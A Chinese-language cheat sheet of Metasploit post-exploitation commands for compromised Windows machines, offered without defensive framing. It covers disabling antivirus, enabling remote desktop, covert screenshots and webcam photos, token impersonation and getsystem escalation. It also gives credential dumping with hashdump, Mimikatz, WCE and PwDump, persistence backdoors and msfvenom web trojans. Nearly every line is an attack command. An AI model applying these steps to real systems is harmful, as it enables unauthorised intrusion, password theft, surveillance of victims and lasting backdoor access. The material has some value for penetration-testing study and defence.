Metaspliot技术
信息收集
进程迁移
getuid #获取一个Meterpreter Shell时,该shell比较脆弱,需要进行迁移 ps migrate 进程号 #选择需要迁移的端口
系统命令
sysinfo #查看系统信息 post/windows/gather/checkvm #检查目标是否运行在虚拟机 route #查看路由信息 post/windows/manage/killav #关闭目标机杀毒软件 post/windows/manage/enable_rdp #开启目标机远程桌面 post/windows/manage/autoroute #查看目标机的本地子网信息 post/windows/gather/enum_logged_on_users #枚举当前有多少用户登录 post/windows/gather/enum_applications #枚举目标机上的应用程序 screenshot #屏幕截图 webcam_list #列出摄像头 webcam_snap #摄像头拍照
文件系统命令
pwd或者getwd #查看当前处于目标机的那个目录 getlwd #查看当前处于本地那个目录 ls #列出当前处于目标机目录的文件 search -f 文件名 -d 目录 #搜索目标机目录中的文件 download 目标机文件目录 本地机目录 #下载文件至本地 upload /root/test.txt C:\ #上传文件
权限提升
权限查询
whoami /groups #在cmd下查询当前权限
本地溢出漏洞提权
getsystem #一般直接提权会失败,需绕过UAC 可以对比系统补丁search exp进行提权
令牌窃取
使用use incognito命令,然后使用list_token -u 列出所有可用的token impersonate_token win\\Administrator #假冒Administrator用户
hash攻击
使用hashdump
hashdump #非system权限下可能会失败 run post/windows/gather/smart_hashdump #WIN 7需提前绕过UAC
使用Quarks PwDump抓取密码(PwDump是一款系统授权信息导出工具)
使用Windows Credentials Editor抓取密码(一款强大的内网渗透工具)
upload /root/wce.exe C:\ #上传工具
使用Mimikatz抓取密码(必须在system权限下运行)
load mimikatz #加载工具到msf, 默认加载32位的,若系统为64位,需要提前将进程迁移至64位进程msv
#获取登录密码的hashkerberos #获取明文密码,但有时候甚至密文密码都获取不到
mimikatz_command -f samdump::hashes
#当kerberos获取不到时使用mimikatz_command -f sekurlsa::searchPasswords
简单命令:wdigest
或者tspkg
创建后门
Windows创建后门
run persistence -h #查看后门参数,通过安装自启动建立后门
php/aspx/asp后门
利用msfvenom生成相应的木马,上传,然后msf建立监听即可